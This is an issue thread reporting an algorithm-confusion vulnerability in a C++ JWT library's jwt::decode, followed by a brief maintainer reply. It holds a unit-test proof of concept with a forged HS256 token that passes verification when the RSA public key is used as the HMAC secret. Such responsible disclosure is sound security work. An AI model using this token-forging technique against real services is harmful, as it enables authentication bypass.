[Vuln] Algorithm Confusion in jwt::decode

[P3ngu1nW]

Hello!
This library has security issues with algorithm confusion.
If the developer allows both the HS algorithm and the RS algorithm, the attacker can use the RSA public key and encrypt the JWT using the HMAC algorithm to bypass the verification.

poc

TEST (RSAAlgo, HS256RSA256DecodingTest)
{
  using namespace jwt::params;

  const char* expected_sign =
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJhbGwiLCJleHAiOjE1MTM4NjIzNzEsImlzcyI6ImFydW4ubXVyYWxpZGhhcmFuIn0.F-LR5k7OodsUlepUh_jUWyalRdMaOnRxVt2rFh5pxNs";

  std::error_code ec;

  //Decode
  std::string key = read_from_file(RSA256_PUB_KEY);
  ASSERT_TRUE (key.length());

  auto dec_obj = jwt::decode(expected_sign, algorithms({"HS256", "RS256"}), ec, secret(key));
  EXPECT_FALSE (ec);
}

Likewise, if the developer allows the None algorithm, then it makes no sense to allow other algorithms.
For details, please refer to the following article: https://portswigger.net/web-security/jwt/algorithm-confusion
How to fix: Refer to https://github.com/Thalhammer/jwt-cpp and limit each key to one algorithm.
Thank you!

[arun11299]

Thanks for the bug report @P3ngu1nW . It is very detailed.
Are you able to provide a PR for this ? If you are, I can help you with the changes.

[P3ngu1nW]

Sorry, I'm not very familiar with C++. TwT